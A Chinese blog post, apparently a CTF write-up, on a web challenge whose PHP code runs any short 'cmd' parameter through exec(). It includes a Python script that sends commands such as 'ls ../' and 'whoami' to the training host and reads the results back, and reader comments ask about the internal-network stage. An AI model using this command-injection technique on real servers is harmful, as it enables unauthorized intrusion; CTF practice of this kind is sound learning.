一个做不来的WEb题目

作者: print("") 分类: 信息安全 发布时间: 2018-06-20 17:47

一个做不来的WEb题目

https://473831530.trains.virzz.com/

<?php
    error_reporting(0);
    /**
     * 
     * Hint: CTF都没打过或者Writeups都没有观摩过,加什么群?
     * 
     */
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    mkdir($sandbox);
    chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 20) {
        exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

然后看到crazy 和life 老哥发了一篇文章给我。唔。

https://www.anquanke.com/post/id/87203

看到这个文章之后,贼tmd 牛皮。牛皮牛皮。

然后一直改不来py 后面life 大黑阔提醒了一下,唔。不要再这个沙盒里面去测试。而是跳到上层。唔,

改出了一个垃圾py

# -*- coding:utf8 -*-
import requests as r
import hashlib
url = 'https://473831530.trains.virzz.com'
# 查询自己的IP
ip = r.get('http://ipv4.icanhazip.com/').text.strip()
sandbox = url + 'sandbox/' + hashlib.md5('orange' + ip).hexdigest() + '/'
 
reset = url + '?reset'
cmd = url + '?cmd='

build2=['ls ../ >../23.txt','ls >../10.txt','whoami >../12.txt']
print build2
for i in build2:
    s = r.get(cmd + i)
    print '[%s]' % s.status_code, s.url

s=r.get('https://473831530.trains.virzz.com/sandbox/23.txt')
print s.text

有趣,有趣,还要内网渗透。真的这么6的么、后续发吧

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

7条评论
  • 13Ling

    2018年8月9日 下午8:00

    楼主,你的代码我用不了,提示第四行有问题,可以解疑一下吗?

    1. print("")

      2018年8月9日 下午9:34

      可能题目换了吧。但是思路是一样的啊

  • kratos

    2018年8月10日 下午2:40

    https://www.anquanke.com/post/id/87203 这个网址里面用的是什么工具啊

    1. print("")

      2018年8月10日 下午2:54

      那个就是手写的代码啊。没有了啊

  • meo9y

    2018年8月27日 下午10:21

    大佬,求出内网渗透。webshell会传的。

  • print("")

    2018年8月28日 下午8:02

    flag 在内网机器中的

  • haha

    2018年8月31日 下午4:20

    dalao 我内网扫了半天没思路能提示下不

发表评论

电子邮件地址不会被公开。 必填项已用*标注